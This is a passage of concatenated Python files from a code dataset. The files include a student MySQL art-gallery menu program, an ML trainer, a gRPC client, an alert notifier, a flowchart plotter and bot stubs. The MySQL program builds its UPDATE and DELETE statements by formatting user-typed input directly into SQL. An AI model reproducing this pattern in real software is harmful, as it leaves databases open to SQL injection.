'{}'\"\"\".format(attribute,values[counter]))\n counter=counter+1;\n setStateStr=\" AND \".join(setState)\n \n return setStateStr\n except Exception as err:\n print(\"Input Fields incorrect\")\n\n\n#Update the value of a row in a table\ndef option5(db_object):\n now = datetime.now()\n expire = now.strftime('%Y-%m-%d %H:%M:%S')\n try:\n #create query for current session\n query= \"\"\"SELECT userSessionId FROM session WHERE expires > '{}'\"\"\".format(expire)\n\n #query sessoions for current userId\n userId=db_object.select(query=query)\n #if query is empty no one is signed in\n if userId==():\n print(\"You're Not Logged In\")\n option2(db_object)\n option5(db_object)\n #get account type \n userId1=userId[0]\n userId2=str(userId1[0])\n acctTypeQuery=\"\"\"SELECT acctType FROM Account WHERE userId = '{}'\"\"\".format(userId2)\n userAcctType= db_object.select(query=acctTypeQuery)\n acctId1=userAcctType[0]\n acctId2=str(acctId1[0])\n\n #get the tables that the account has Write access to\n featureQuery=\"\"\"SELECT feature FROM accountFeatures WHERE accountType = '{}'\"\"\".format(acctId2)\n featureId=db_object.select(query=featureQuery)\n\n tableList=[]\n tables=[]\n permissiveTables=[]\n\n for feature in featureId:\n tableList.append(feature[0])\n \n for tabled in tableList:\n tables.append(db_object.select(query=\"\"\"SELECT tables FROM feature WHERE featureId = '{}' AND permission = 'Write'\"\"\".format(str(tabled))))\n \n for tabs in tables:\n for t in tabs:\n if t[0]!= ():\n permissiveTables.append(t[0])\n #display tables\n print(\"Tables with Write Permission\")\n if permissiveTables == []:\n print(\"You Dont have that permission\")\n return\n count=0\n for search in permissiveTables:\n print(\"\"\"{}. {}\"\"\".format((count+1),search ))\n count=count+1\n except Exception as err:\n print(err)\n\n #get table that user is updating\n try:\n userSearch= int(input(\"Type the number of the table you would like to update: \"))\n searchTable = permissiveTables[(userSearch-1)]\n columns = db_object.get_column_names(searchTable)\n print(\"Fields in this Table: \")\n for column in columns:\n print(column[0])\n except Exception as err:\n print(\"Number must be in the range.\")\n option5(db_object)\n \n \n\n\n #display fields in chosen table\n\n \n\n #get condition and values for the updated table\n print(\"Which rows do you want to change? \")\n conditionsQuery= get_condition_fields()\n print(conditionsQuery)\n print(\"What values do you want to add?\")\n updateQuery= get_update_fields()\n upQuery=\"\"\"UPDATE {} SET {} WHERE {}\"\"\".format(searchTable,updateQuery,conditionsQuery)\n print(upQuery)\n \n #update values\n try:\n db_object.update(query=upQuery)\n print(\"Update Successul\")\n return\n except Exception as err:\n print(err)\n return\n return\n #searched = db_object.select(query=\"\"\"SELECT * FROM {} WHERE {} = '{}'\"\"\".format(permissiveTables[(userSearch-1)],fieldSearch,valueSearch))\n #print(searched)\n\n#Delete a row from a table based on search criteria\ndef option6(db_object):\n now = datetime.now()\n expire = now.strftime('%Y-%m-%d %H:%M:%S')\n try:\n #create query for current session\n query= \"\"\"SELECT userSessionId FROM session WHERE expires > '{}'\"\"\".format(expire)\n\n #query sessoions for current userId\n userId=db_object.select(query=query)\n\n #if query is empty no one is signed in\n if userId==():\n print(\"You're Not Logged In\")\n option2(db_object)\n option6(db_object)\n #get the accountType of the logged in user\n userId1=userId[0]\n userId2=str(userId1[0])\n acctTypeQuery=\"\"\"SELECT acctType FROM Account WHERE userId = '{}'\"\"\".format(userId2)\n userAcctType= db_object.select(query=acctTypeQuery)\n acctId1=userAcctType[0]\n acctId2=str(acctId1[0])\n #get tables with read access\n featureQuery=\"\"\"SELECT feature FROM accountFeatures WHERE accountType = '{}'\"\"\".format(acctId2)\n featureId=db_object.select(query=featureQuery)\n\n tableList=[]\n tables=[]\n #show tables available to delete\n permissiveTables=[]\n for feature in featureId:\n tableList.append(feature[0])\n \n for tabled in tableList:\n tables.append(db_object.select(query=\"\"\"SELECT tables FROM feature WHERE featureId = '{}' AND permission = 'Write'\"\"\".format(str(tabled))))\n\n for tabs in tables:\n for t in tabs:\n if t[0]!= ():\n permissiveTables.append(t[0])\n print(\"Tables with Write Permission\")\n if permissiveTables == []:\n print(\"You Dont have that permission\")\n return\n except Exception as err:\n print(err)\n\n count=0\n for search in permissiveTables:\n print(\"\"\"{}. {}\"\"\".format((count+1),search ))\n count=count+1\n #get target table for deleteing\n try:\n userSearch= int(input(\"Type the number of the table you would like to delete from? \"))\n searchTable = permissiveTables[(userSearch-1)]\n except Exception as err:\n print(\"Number must be in the range.\")\n option6(db_object)\n columns = db_object.get_column_names(searchTable)\n\n fieldList = []\n valueList = []\n #display fields \n print(\"Fields in this Table: \")\n for column in columns:\n print(column[0])\n\n #get conditions for the delete\n print(\"Which rows do you want to delete? \")\n conditionsQuery= get_condition_fields()\n \n deleteQuery=\"\"\"DELETE FROM {} WHERE {}\"\"\".format(searchTable,conditionsQuery)\n print(deleteQuery)\n \n\n try:\n\n db_object.delete(query=deleteQuery)\n print(\"Delete Successful\")\n except Exception as err:\n print(err)\n return\n return\n\n\n####Driver Program.....\n\nfrom database import DB\n\nprint(\"Setting up the database.......\\n\")\n\ndb = DB(config_file=\"sqlconfig.conf.py\")\n\n\ndatabase= \"ArtGalleryManagementDB\"\n\nif db.create_database(database=database, drop_database_first=True):\n print(\"Created database{}\".format(database))\nelse:\n print(\"An error occurred while creating database {} \".format(database))\n\ndb.run_sql_file(\"databasemodel.sql\")\n\n#insert sample data from insert.sql\ndb.run_sql_file(\"inserts.sql\")\n\nprint(\"\\nDone Setting Up\")\ntempUserID=find_id_number(db,\"User\",\"userid\")\n\n\n#option1(db,tempUserID)\n#option2(db)\n#option3(db)\n#option4(db\n\nshow_menu()\noption = int(input(\"Select one option from the menu: \"))\n#db._execute_query(query=\"INSERT INTO session ( sessionId, userSessionId, expires ) VALUES ( 25, 5, 2020-08-06 02:40:35 )\",values=())\nwhile option != 7:\n if option == 1:\n option1(db) # create your account\n elif option == 2:\n option2(db)\n elif option == 3:\n option3(db)\n elif option == 4:\n option4(db)\n elif option == 5:\n option5(db)\n elif option == 6:\n option6(db)\n\n\n show_menu()\n option = int(input(\"Select one option from the menu: \"))\n\n\n\n","sub_path":"CSC675FinalProject/python_mysql.py","file_name":"python_mysql.py","file_ext":"py","file_size_in_byte":17312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"212588983","text":"from design_baselines.utils import spearman\nfrom design_baselines.utils import perturb\nimport tensorflow as tf\nimport numpy as np\nimport random\n\nclass Trainer(tf.Module):\n def __init__(\n self,\n model,\n model_opt,\n ema_model,\n ema_rate,\n perturb_fn,\n is_discrete,\n sol_x,\n sol_x_opt,\n sol_x_eps,\n coef_pessimism,\n coef_stddev,\n ):\n\n super().__init__()\n self.model = model\n self.model_opt = model_opt\n self.ema_model = ema_model\n self.ema_rate = ema_rate\n self.perturb_fn = perturb_fn\n self.is_discrete = is_discrete\n self.init_sol_x = sol_x\n self.sol_x = tf.Variable(sol_x)\n self.sol_x_opt = sol_x_opt\n self.sol_x_eps = sol_x_eps\n self.coef_pessimism = coef_pessimism\n self.coef_stddev = coef_stddev\n self.sol_x_samples = tf.shape(self.sol_x)[0]\n\n def get_sol_x(self):\n return self.sol_x.read_value()\n\n @tf.function(experimental_relax_shapes=True)\n def train_step(self, x, y):\n x = self.perturb_fn(x)\n\n with tf.GradientTape() as tape:\n d = self.model.get_distribution(x, training=True)\n loss_nll = -d.log_prob(y)\n rank_correlation = spearman(y[:, 0], d.mean()[:, 0])\n\n with tf.GradientTape() as inner_tape:\n inner_tape.watch(self.sol_x)\n inp = tf.math.softmax(self.sol_x) if self.is_discrete else self.sol_x\n sol_d = self.model.get_distribution(inp, training=True)\n loss_sol_x = sol_d.mean() - self.coef_stddev * tf.math.log(sol_d.stddev())\n\n sol_x_grad = inner_tape.gradient(loss_sol_x, self.sol_x)\n sol_neg_x = self.sol_x + self.sol_x_eps * sol_x_grad\n inp = tf.math.softmax(sol_neg_x) if self.is_discrete else sol_neg_x\n sol_neg_d = self.model.get_distribution(inp, training=True)\n loss_sol_neg_x = sol_neg_d.mean() - self.coef_stddev * tf.math.log(sol_neg_d.stddev())\n\n loss_pessimism = ((loss_sol_x - loss_sol_neg_x) / self.sol_x_eps) ** 2\n loss_total = (\n tf.reduce_mean(loss_nll) + self.coef_pessimism * tf.reduce_mean(loss_pessimism)\n )\n\n # take gradient steps on the model\n grads = tape.gradient(loss_total, self.model.trainable_variables)\n grads = [tf.clip_by_norm(grad, 1.0) for grad in grads]\n self.model_opt.apply_gradients(zip(grads, self.model.trainable_variables))\n\n for var, ema_var in zip(self.model.trainable_variables, self.ema_model.trainable_variables):\n ema_var.assign(self.ema_rate * ema_var + (1 - self.ema_rate) * var)\n\n sol_x_grad_norm = tf.norm(tf.reshape(sol_x_grad, [self.sol_x_samples, -1]), axis=1)\n\n statistics = dict()\n statistics[\"loss/nll\"] = loss_nll\n statistics[\"loss/pessimism\"] = loss_pessimism\n statistics[\"loss/total\"] = loss_total\n statistics[\"sol_x_grad_norm\"] = tf.reduce_mean(sol_x_grad_norm)\n statistics[\"mean\"] = tf.reduce_mean(d.mean())\n statistics[\"stddev\"] = tf.reduce_mean(d.stddev())\n statistics[\"rank_corr\"] = rank_correlation\n\n return statistics\n\n @tf.function(experimental_relax_shapes=True)\n def validate_step(self, x, y):\n d = self.ema_model.get_distribution(x, training=True)\n loss_nll = -tf.reduce_mean(d.log_prob(y))\n rank_correlation = spearman(y[:, 0], d.mean()[:, 0])\n loss_total = loss_nll\n\n statistics = dict()\n statistics[\"loss/nll\"] = loss_nll\n statistics[\"loss/total\"] = loss_total\n statistics[\"mean\"] = tf.reduce_mean(d.mean())\n statistics[\"stddev\"] = tf.reduce_mean(d.stddev())\n statistics[\"rank_corr\"] = rank_correlation\n\n return statistics\n\n @tf.function(experimental_relax_shapes=True)\n def update_step(self):\n with tf.GradientTape() as tape:\n tape.watch(self.sol_x)\n inp = tf.math.softmax(self.sol_x) if self.is_discrete else self.sol_x\n d = self.ema_model.get_distribution(inp, training=False)\n loss = -(d.mean() - self.coef_stddev * tf.math.log(d.stddev()))\n\n sol_x_grad = tape.gradient(loss, self.sol_x)\n sol_x_grad_norm = tf.norm(tf.reshape(sol_x_grad, [self.sol_x_samples, -1]), axis=1)\n sol_x_grad = tf.clip_by_norm(sol_x_grad, 1.0)\n self.sol_x_opt.apply_gradients([[sol_x_grad, self.sol_x]])\n\n travelled = tf.linalg.norm(self.sol_x - self.init_sol_x) / tf.cast(\n tf.shape(self.sol_x)[0], dtype=tf.float32\n )\n\n statistics = dict()\n statistics[\"loss\"] = tf.reduce_mean(loss)\n statistics[\"mean\"] = tf.reduce_mean(d.mean())\n statistics[\"log_stddev\"] = tf.reduce_mean(tf.math.log(d.stddev()))\n statistics[\"travelled\"] = travelled\n statistics[\"sol_x_grad_norm\"] = tf.reduce_mean(sol_x_grad_norm)\n\n return statistics","sub_path":"design_baselines/fastgradpess/trainers.py","file_name":"trainers.py","file_ext":"py","file_size_in_byte":4977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"286513207","text":"import grpc\nfrom .protofiles.imagedata_pb2 import ImageData\nfrom .protofiles.imagedata_pb2_grpc import PredictorStub\nfrom experiments.utils import get_one_image\nimport numpy as np\n\n\ndef init(config):\n img, init.img_class = get_one_image(transpose=(2, 0, 1))\n imgdata = ImageData()\n # protobuf assumes the shape of the image is (1, 3, height, width)\n # where 1 is the batchsize and 3 is number of channels\n imgdata.image = img.tobytes()\n imgdata.height = img.shape[2]\n imgdata.width = img.shape[3]\n imgdata.dtype = img.dtype.name\n init.image = imgdata\n channel = grpc.insecure_channel('localhost:50051')\n init.stub = PredictorStub(channel)\n\n\ndef run(config, reporter):\n init(config)\n with reporter:\n generator = reporter.run(config['exp_count'], init.stub.GetPrediction, init.image)\n for output in generator:\n assert len(output.output) == 1000\n assert np.argmax(output.output) == init.img_class\n","sub_path":"experiments/_pytorch/_grpc_server/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"360771344","text":"# -*- coding: utf-8 -*-\nimport json\nimport logging\nimport time\nimport asyncio\n\nfrom aiohttp import ClientError\nfrom urllib.parse import urljoin, urlencode\nfrom datetime import datetime, timedelta\n\nfrom alamo_worker.conf import settings\nfrom alamo_worker.http_client import HttpClient\n\nlogger = logging.getLogger(__name__)\n\n\nclass HttpNotificationClient(object):\n _timeout = 30\n _retries = 3\n _delay = 5\n\n def __init__(self):\n assert getattr(settings, 'ALAMO_HTTP_NOTIFICATION_URL', None), (\n '`{}` could not be used since `ALAMO_HTTP_NOTIFICATION_URL` '\n 'is missing in `{}`.'.format(self.__class__.__name__, settings)\n )\n self._http = HttpClient(self._timeout)\n\n def merged_tags(self, check, trigger):\n \"\"\"Merges tags in check.tags and trigger.tags\n\n :param check: dict containing check definition\n :param trigger: dict containing trigger definition\n\n :rtype: list\n :return: list of unique tags\n \"\"\"\n return list(set(check.tags + trigger.tags))\n\n async def send(self, check, trigger, event_type):\n logger.info(\n 'Sending alert `%s` for check id=`%s`', event_type, check.id\n )\n\n payload = self.build_data(check, trigger, event_type)\n await self.make_request(check, payload, event_type)\n\n def get_links(self, check_uuid, trigger):\n links = {name: dict(type=link.type, href=link.href)\n for name, link in trigger.meta.links}\n\n timestamp = datetime.utcnow()\n results_start = timestamp + timedelta(\n minutes=settings.RESULT_RANGE_START\n )\n results_end = timestamp + timedelta(\n minutes=settings.RESULT_RANGE_END\n )\n\n links['alamo_api_url'] = dict(\n type='link',\n href='{}?{}'.format(\n urljoin(settings.ALAMO_URL, '/checks/{}/'.format(check_uuid)),\n urlencode([\n ('triggers', trigger.uuid),\n ('from', results_start.strftime('%Y-%m-%dT%H:%M:%SZ')),\n ('until', results_end.strftime('%Y-%m-%dT%H:%M:%SZ')),\n ])\n )\n )\n\n return links\n\n def _get_failed_metrics(self, trigger):\n failed_metrics = trigger.meta.failed_metrics\n return failed_metrics.as_dict() if failed_metrics else None\n\n def build_data(self, check, trigger, event_type):\n ignored = ('enabled', 'id', 'name', 'tags', 'severity', 'result',\n 'meta', 'url', 'uuid',)\n created = time.mktime(datetime.now().timetuple())\n event = dict(\n integration_key=check.integration_key,\n event_type=event_type,\n client=settings.ALAMO_CLIENT_NAME,\n client_url=trigger.url,\n message=trigger.result.message or '{}: OK'.format(trigger.name),\n created=created,\n payload=dict(\n check_name=check.name,\n uuid=check.uuid,\n check_uuid=check.uuid,\n entity_id=check.entity_id,\n entity_name=check.entity_name,\n trigger_name=trigger.name,\n trigger_uuid=trigger.uuid,\n eventid=trigger.uuid,\n severity=trigger.severity,\n # TODO(pavlo): reaction could be dropped\n reaction=check.reaction,\n service=check.service_name,\n service_id=check.service_id,\n target=trigger.target,\n environment=check.environment,\n type=check.type,\n tags=self.merged_tags(check, trigger),\n links=self.get_links(check.uuid, trigger),\n failed_metrics=self._get_failed_metrics(trigger),\n )\n )\n event['payload'].update({k: v for k, v in check.fields})\n event['payload'].update({k: v for k, v in trigger if k not in ignored})\n # FIXME(pavlo): need to reorganize rule matching in AER when multiple\n # FIXME: sources will be officially supported (fields overriding...)\n for source in check.sources:\n for _field, _value in source:\n if _field in ('name', 'type'):\n continue\n event['payload'][_field] = _value\n return event\n\n async def make_request(self, check, payload, event_type):\n headers = {\n 'content-type': 'application/json'\n }\n extra = {\n 'check_id': check.id,\n 'event_type': event_type,\n 'notification_type': 'http',\n }\n for i in range(self._retries):\n try:\n response = await self._http.request(\n 'post',\n settings.ALAMO_HTTP_NOTIFICATION_URL,\n check=check,\n data=json.dumps(payload),\n raise_for_status=True,\n headers=headers,\n )\n data = await response.json()\n except (ValueError, TimeoutError, ConnectionError, ClientError) as e: # noqa\n logger.exception(\n \"Failed to send result for check `%s`, \"\n \"error was: %s, retry %s out of %s...\",\n check.id, e, i + 1, self._retries, extra=extra)\n await asyncio.sleep(self._delay)\n else:\n break\n else:\n logger.error(\"Failed to send result for check `%s`\", check.id,\n extra=extra)\n return\n\n event_id, integration_key, date_key = (\n data.get('event_id'), data.get('integration_key'),\n data.get('date_key')\n )\n extra.update({\n 'event_id': event_id,\n 'integration_key': integration_key,\n 'date_key': date_key,\n })\n logger.info(\n '`%s` event with id `%s` '\n 'successfully created for integration key `%s`',\n event_type, event_id, integration_key, extra=extra\n )\n","sub_path":"alamo_worker/alerter/notifications/http.py","file_name":"http.py","file_ext":"py","file_size_in_byte":6079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"446018384","text":"#-------------------------------------------------------------------------------\n# Name: python94\n# Purpose:\n#\n# Author: Jean\n#\n# Created: 17/08/2018\n# Copyright: (c) Jean 2018\n# Licence: \n#-------------------------------------------------------------------------------\nimport numpy as np\nimport pylab as pl\n\ng1=0.75\nn=10\ne=2\ndebug=False\n\n\ndef grille(xmax,xmin,nx,ymin,ymax,ny,g1):\n X=np.linspace(xmin,xmax,nx)\n Y=np.linspace(ymin,ymax,ny)\n '''\n #trace un trait entre (0,ymin) et (0,ymax)\n pl.plot([0,0],[ymin,ymax],color='red') #idem segment(0,0,0,1)\n #trace un trait entre (1,ymin) et (1,ymax)\n pl.plot([1,1],[ymin,ymax],color='red') #idem segment(1,0,1,1)\n '''\n for k in range(0,nx):\n pl.plot([X[k],X[k]],[ymin,ymax],color=str(g1))\n for k in range(0,ny):\n pl.plot([xmin,xmax],[Y[k],Y[k]],color=str(g1))\n if debug:\n pl.show()\n pl.close()\n\n\ndef segment(x1,y1,x2,y2,c='red',e=3):\n pl.plot([x1,x2],[y1,y2],color=c,lw=e)\n if debug:\n pl.show()\n pl.close()\n\ndef tranlater(x,y,u,v):\n return (x+u,y+v)\n\ndef rectangle(x,y,u,v,L1,L2,d,c='green',e=3):\n if d=='d':\n i=1j\n else:\n i=-1j\n\n r=(u**2+v**2)**(1/2)\n u1,v1=u/r,v/r\n z1=x+y*1j\n z2=(x+L1*u1)+(y+L1*v1)*1j\n z3=z2-(z1-z2)*i*L2/L1\n z4=z1+(z2-z1)*i*L2/L1\n\n Z=[z1,z2,z3,z4,z1]\n X=np.real(Z)\n Y=np.imag(Z)\n\n pl.plot(X,Y,color=c,lw=e)\n #show for test\n if debug:\n pl.show()\n pl.close()\n\ndef instruction(x,y,h):\n '''\n dessine case instruction\n x,y point de connexion\n h demi-largeur\n retourne extrémité segment\n '''\n rectangle(x-h,y,1,0,2*h,h,'i','black',1.5)\n segment(x,y-h,x,y-2*h,'black',1.5)\n\n return (x,y-2*h)\n\ndef condition(x0,y0,h,cg,cd):\n lg=(2**(1/2)*h)\n rectangle(x0,y0,-1,-1,lg,lg,'d','black',1.5)\n #segment gauche en vert\n x1,y1=tranlater(x0,y0,-h/2,-3*h/2)\n x3,y3=tranlater(x1,y1,-cg*h,-cg*h)\n segment(x1,y1,x3,y3,'green',1.5)\n #segment droit en rouge\n x2,y2=tranlater(x0,y0,h/2,-3*h/2)\n x4,y4=tranlater(x2,y2,cd*h,-cd*h)\n segment(x2,y2,x4,y4,'red',1.5)\n\n return x3,y3,x4,y4\n\ndef test():\n global debug\n debug=True\n print(debug)\n grille(0,1,n,0,1,n,0.75)\n segment(0,0,0,1)\n rectangle(0,0,1,0,2,1,'d','black',1.5) #direct\n rectangle(0,0,1,0,2,1,'i','black',1.5) #indirect sens aiguille\n debug=False\n print(debug)\n #dessine grille et instruction\n grille(0,1,n,0,1,n,g1)\n s1,s2=instruction(0.5,0.8,0.2)\n pl.show()\n pl.close()\n\ndef organigramme():\n #dessine grille et instruction\n grille(0,1,n,0,1,n,g1)\n h=0.1\n pl.title('Organigramme')\n x,y=instruction(0.5,0.95,h)\n a,b,c,d=condition(x,y,h,1,1)\n instruction(a,b,h)\n instruction(c,d,h)\n pl.show()\n pl.close()\n\n#test()\norganigramme()\n\ndef main():\n pass\n\nif __name__ == '__main__':\n main()\n","sub_path":"python94.py","file_name":"python94.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"465923103","text":"from tools.imports import *\nfrom config import settings\n\nintents = discord.Intents.all()\nprefix = '/'\n\nclient = commands.Bot(command_prefix=prefix, intents=intents)\nslash = SlashCommand(client, sync_commands=True)\n\nclient.remove_command('help')","sub_path":"tools/client_init.py","file_name":"client_init.py","file_ext":"py","file_size_in_byte":244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"290048990","text":"from datetime import datetime\n\nfrom .graph_writer import write_graph\n\nfrom ...bgp_as import BGPAS\nfrom ...simulator_engine import SimulatorEngine\n\n\n# tmp_path is a pytest fixture\ndef run_example(tmp_path,\n peers=list(),\n customer_providers=list(),\n as_types=dict(),\n as_classes_dict={0: BGPAS},\n announcements=list(),\n local_ribs=dict(),\n ):\n \"\"\"Runs an example\"\"\"\n\n path = tmp_path / \"example.tsv\"\n write_graph(peers, customer_providers, as_types, path)\n print(\"populating engine\")\n start = datetime.now()\n engine = SimulatorEngine(str(path), as_classes_dict)\n print((start-datetime.now()).total_seconds())\n print(\"Running engine\")\n start = datetime.now()\n engine.run(announcements, clear=False)\n input((start-datetime.now()).total_seconds())\n for as_obj in engine:\n print(\"ASN:\", as_obj.asn)\n for prefix, ann in as_obj.local_rib.items():\n print(ann)\n if local_ribs:\n as_obj.local_rib.assert_eq(local_ribs[as_obj.asn])\n","sub_path":"lib_bgp_simulator_engine/tests/utils/run_example.py","file_name":"run_example.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"181838583","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 15 18:33:38 2017\n\n@author:Ing. Bruno E. Chávez\nOptimización de flujos \n\"\"\"\n\nfrom scipy.optimize import *\nimport xlwings as xw\ndef run(hoja):\n sheet=xw.sheets[hoja]\n sheet.range(\"I4\").value=0\n sheet2=xw.sheets[\"Restricciones\"]\n def get_flows():\n '''Compila en una lista las incógnitas de las importaciones'''\n incog_lis=[[],[],[],[\"\",[]],[]] \n '''Descripción incog_lis\n #0-> incognitas totales, 1->Total de las sumas,\n #2->Lista de número de incognitas en Importaciones y lng, \n #3-> 3[0]-->Status si LNG es grado de libertad, 3[1]--> si es variable o fijo\n #4-> indices, 4[0]--> indice final variables imp, 4[1]-->indice final variables LNG'''\n \n j=0 #-> Contador para indices (incog_lis[4])\n \n #Datos Importaciones\n \n b=sheet.range(\"A11\").value\n i=11\n k=0\n while(b!=\"TOTAL\"):\n a=sheet.range(\"B\"+str(i)).value\n incog_lis[0].append(a)\n i+=1\n if a==\"x\":\n k+=1\n j+=1\n b=sheet.range(\"A\"+str(i)).value\n incog_lis[1].append(i)\n incog_lis[2].append(k)\n incog_lis[4].append(j)\n #Datos LNG \n b=sheet.range(\"M11\").value\n i=11\n k=0\n while(b!=\"TOTAL\"):\n a=sheet.range(\"N\"+str(i)).value\n incog_lis[0].append(a)\n i+=1\n if a==\"x\":\n incog_lis[3][1].append(\"yes\")\n k+=1\n else:\n incog_lis[3][1].append(\"no\")\n j+=1\n b=sheet.range(\"M\"+str(i)).value\n incog_lis[1].append(i)\n incog_lis[2].append(k)\n incog_lis[4].append(j)\n if incog_lis[2][1]==0:\n incog_lis[3][0]=False\n else:\n incog_lis[3][0]=True\n \n return incog_lis\n def get_incogs(incog,count,LNG_status,is_var,max_LNG=[]):\n '''establece funcion objetivo para optimizar a partir de incognitas en importaciones\n incog type -> lista\n LNG_status -> Si el lng es variable o es fijo, si es variable LNG_status=True.(incog[3][0])\n is_var-> lista tipo [\"yes\",\"no\",\"yes\",..,\"no\"] de variables lng (incog[3][1])\n max_LNG -> max permisible de LNG'''\n c=[]\n mults=[]\n for mult in max_LNG:\n a=mult/10\n mults.append(a)\n print(mults)\n if count==0 and LNG_status==True:\n k=0 #k -> contador para lista de is_var\n for i in range(incog[4][0],incog[4][1]):\n if incog[0][i]==\"x\" and incog[3][1][k]==\"yes\":\n incog[0][i]=0\n k+=1 \n \n k=0\n j=0 #-> Contador para mults\n if count>0 and LNG_status==True: \n for i in range(incog[4][0],incog[4][1]):\n if incog[3][1][k]==\"yes\":\n incog[0][i]=mults[j]\n j+=1\n k+=1\n \n if count>1 and LNG_status==True:\n k=0\n for i in range(incog[4][0],incog[4][1]):\n if incog[3][1][k]==\"yes\":\n incog[0][i]=count*mults[k]\n k+=1\n for i in incog[0]:\n if i==\"x\":\n c.append(1)\n return c\n def optimizeflows(flows,count=-1,LNG_status=False):\n #Establece limites de las variables\n \n #Limites Imp\n k=4\n bound_lis_imp=[]\n for i in range(0,flows[4][0]):\n if flows[0][i]==\"x\":\n lower=sheet2.range(\"E\"+str(k)).value\n upper=sheet2.range(\"F\"+str(k)).value\n limits=[lower,upper]\n bound_lis_imp.append(limits)\n k+=1\n else:\n k+=1\n \n #Limites LNG\n \n if flows[3][0]==True:\n k=4\n bound_lis_LNG=[]\n max_LNG=[]\n for i in range(flows[4][0],flows[4][1]):\n lower=sheet2.range(\"K\"+str(k)).value\n upper=sheet2.range(\"L\"+str(k)).value\n limits=[lower,upper]\n bound_lis_LNG.append(limits)\n max_LNG.append(upper)\n k+=1\n \n if flows[3][0]==False:\n max_LNG=[]\n #convierte bound_lis a tuple\n \n bounds_tuple=tuple()\n for i in range(0,len(bound_lis_imp)):\n tup=(bound_lis_imp[i][0],bound_lis_imp[i][1])\n bounds_tuple+=(tup,)\n \n #MODIFICA VALORES LNG\n \n if flows[3][0]==True:\n c=get_incogs(flows,count,LNG_status,flows[3][1],max_LNG)\n else:\n c=get_incogs(flows,count,LNG_status,flows[3][1]) \n \n #Obtiene valor que debe de tener B\n \n Tot=sheet.range(\"k\"+str(4)).value\n Tot=float(Tot)\n for i in range(0,flows[4][0]):\n if flows[0][i]!=\"x\":\n Tot-=float(flows[0][i])\n if LNG_status==True and count>=1:\n k=0\n for i in range(flows[4][0],flows[4][1]):\n if flows[3][1][k]==\"yes\":\n Tot-=flows[0][i]\n k+=1\n else:\n k+=1\n #Genera ecuacion de x1+x2+x2...+xn a 1+1+1+.....+1 \n B=[Tot]\n \n A=[[]]\n for i in c:\n A[0].append(1)\n \n #LLama resolverdor lineal tipo simplex\n res=linprog(c,A_eq=A,b_eq=B,bounds=bounds_tuple,options={\"disp\":True})\n return [res,max_LNG]\n\n\n#Termina definicion de funciones, comienza subrutina \n\n flows=get_flows()\n total_flag=False\n if \"x\" in flows[0]:\n if flows[3][0]==True:\n flag=True\n count=0\n while(flag==True):\n res=optimizeflows(flows,count,True)\n \n if res[0].success==True:\n total_flag=True\n flag=False \n else:\n if count==10:\n flag=False\n sheet.range(\"I4\").value=1\n else:\n count+=1\n for i in range(flows[4][0],flows[4][1]):\n j=0\n if flows[3][1][j]==\"yes\" and flows[0][i]==res[1][j]:\n j+=1\n total_flag=False\n flag=False\n else:\n j+=1\n else:\n res=optimizeflows(flows)\n x_sols=res[0].x\n \n #Valores de py a excel\n \n if flows[3][0]==True and total_flag==True:\n \n k=11\n j=0\n if res[0].success==True:\n \n #Valores de Importaciones\n \n for i in range(0,flows[4][0]):\n if flows[0][i]==\"x\":\n sheet.range(\"B\"+str(k)).value=x_sols[j]\n k+=1\n j+=1\n else:\n k+=1\n \n #Valores de LNG\n \n k=11 #-> Numero de fila en excel\n j=0 #-> Contador para is_var(flows[3][1])\n for i in range(flows[4][0],flows[4][1]): \n if flows[3][1][j]==\"yes\":\n sheet.range(\"N\"+str(k)).value=flows[0][i]\n k+=1\n j+=1\n else:\n k+=1\n j+=1\n else:\n k=11\n j=0\n if res[0].success==True:\n for i in flows[0]:\n if i==\"x\":\n sheet.range(\"B\"+str(k)).value=x_sols[j]\n k+=1\n j+=1\n else:\n k+=1\ndef run_all():\n for i in xw.sheets: \n if i.name!=\"Restricciones\":\n run(i.name)\ndef run_single():\n run(xw.sheets.active.name)\ndef set_x_all():\n for i in xw.sheets:\n if i.name!=\"Restricciones\":\n sheet=xw.sheets[i.name]\n #Setea valor para solución viable\n sheet.range(\"I4\").value=0\n #Vacia valores de Imp.\n b=sheet.range(\"A11\").value\n j=11\n while(b!=\"TOTAL\"):\n sheet.range(\"B\"+str(j)).value=\"x\"\n j+=1\n b=sheet.range(\"A\"+str(j)).value\n \n #Vacia valores de LNG\n b=sheet.range(\"N11\").value\n j=11\n while(b!=\"TOTAL\"):\n sheet.range(\"N\"+str(j)).value=\"x\"\n j+=1\n b=sheet.range(\"M\"+str(j)).value\ndef set_x():\n b=xw.Range(\"A11\").value\n #Setea valor para solución viable\n xw.Range(\"I4\").value=0\n #Limpia valores de Importación\n j=11\n while(b!=\"TOTAL\"):\n xw.Range(\"B\"+str(j)).value=\"x\"\n j+=1\n b=xw.Range(\"A\"+str(j)).value\n \n #Limpia valores de LNG \n b=xw.Range(\"N11\").value\n j=11\n while(b!=\"TOTAL\"):\n xw.Range(\"N\"+str(j)).value=\"x\"\n j+=1\n b=xw.Range(\"M\"+str(j)).value\n","sub_path":"Balance/Final Caja Negra/opti_buscaLNG.py","file_name":"opti_buscaLNG.py","file_ext":"py","file_size_in_byte":9274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"98666925","text":"import discord\nfrom discord.ext import commands\nimport random\n\nclass Memes:\n \"\"\"Random commands that probably shouldn't even exist.\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n self.angrymsgs = [\n \"When life gives you lemons, get mad!\",\n # PORTAL REFERENCING INTENSIFIES\n \"When life gives you lemons? Don't make lemonade. Make life take the lemons back! Get mad!\\n*'I don't want your damn lemons! What am I supposed to do with these?'*\\n\\nDemand to speak to life's manager! Make life *rue the day* it thought it could give __Cave Johnson__ 